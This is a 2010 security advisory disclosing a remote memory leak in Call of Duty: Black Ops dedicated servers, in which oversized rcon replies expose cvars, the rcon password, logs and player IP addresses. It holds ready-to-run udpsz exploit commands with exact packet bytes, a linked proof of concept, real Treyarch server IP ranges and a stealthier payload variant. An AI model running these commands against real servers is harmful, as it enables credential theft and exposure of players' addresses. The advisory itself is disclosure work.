#######################################################################

                             Luigi Auriemma

Application:  Call of Duty: Black Ops
              http://www.callofduty.com
Versions:     unknown, refer to the release date of this advisory
Platforms:    unknown (it should be Windows)
Bug:          memory leak
Exploitation: remote, versus server
Date:         18 Nov 2010
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    aluigi.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


Call of Duty Black Ops (cod7) is the new game of the CoD series.
Just like cod6 also this one is distribuited as "client-only", which
means that a normal user cannot host a server.
Only some hosting companies (GameServers) or the same Treyarch can host
dedicated servers.


#######################################################################

======
2) Bug
======


When the server receives an rcon packet (opcode 0x00) it replies with
a packet having a fixed size of 1168 bytes, doesn't matter if its
content is smaller.

The result is that various parts of the server's memory are disclosed
remotely to anyone and through the continuous sending of these invalid
rcon packets is possible to monitor the server and maybe retrieving
important informations like the value of cvars (included rcon), parts
of the logs (included the output of previous rcon packets of the
admin), parts of the server's configuration and the IP addresses of the
other players.


#######################################################################

===========
3) The Code
===========


http://aluigi.org/testz/udpsz.zip
http://aluigi.org/poc/cod7mem.zip

  udpsz -C "ffffffff 00 0000000000000000" -D SERVER 3074 -1

or with the filter for easier visualization and monitoring:

  udpsz -q -l 1000 -C "ffffffff 00 0000000000000000" -D -L cod7mem.dll SERVER 3074 -1

for example the Treyarch servers are available in a certain range that
covers different C classes like 173.199.77.x, 173.199.78.x, 173.199.79.x
and so on.

it's possible to use "ffffffff 00 6100000000000000" for receiving a
reply string shorter than 50 bytes and so more memory visible but I
don't know if it will appear in the server's logs because it could be
considered a password guessing attack.


#######################################################################

======
4) Fix
======


No fix.


#######################################################################